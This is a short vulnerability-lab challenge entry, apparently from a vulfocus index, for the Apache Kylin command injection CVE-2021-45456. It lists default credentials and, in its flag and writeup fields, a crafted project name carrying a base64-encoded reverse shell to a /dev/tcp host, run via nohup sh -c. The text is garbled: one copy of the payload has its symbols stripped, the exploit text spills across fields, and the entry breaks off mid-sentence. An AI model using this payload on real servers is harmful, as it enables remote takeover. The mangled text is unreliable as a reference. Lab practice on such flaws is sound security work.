| ID: | 16516 |
|---|---|
| 标题: | kylin 命令注入 (CVE-2021-45456) |
| 描述: | kylin 命令注入 (CVE-2021-45456) vulfocus/kylin-cve_2021_45456:latest Apache kylin 在使用用户传入的项目名称执行一些命令之前,会检查项目的合法性。检查的内容与 DiagnosisService 中用作 shell 命令参数的内容不匹配。这可能会导致非法项目名称通过检查并执行以下步骤,从而导致命令注入漏洞。此问题影响 Apache Kylin 4.0.0。 该环境较大,建议pull到本地启动 访问其7070映射端口 http://ip:port/kylin/login 默认密码:ADMIN/KYLIN |
| 类型: | WEB |
| 网站: | vulfocus |
| 题目链接: | https://vulfocus.cn |
| 赛事: | None |
| 年度: | None |
| Flag值: | Apache Kylin命令注入漏洞CVE-2021-45456的利用方式为:攻击者通过构造恶意项目名称(如nohupshcechoc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS8xMjM0NSAwPiYxCgbase64d),在访问诊断接口时通过反引号执行任意命令(如nohup sh -c "$(echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yLjQ4LzEyMzQ1IDA+JjE= |
| writeup: | base64 -d)" &),实现命令注入 1 2。该漏洞影响Apache Kylin 4. |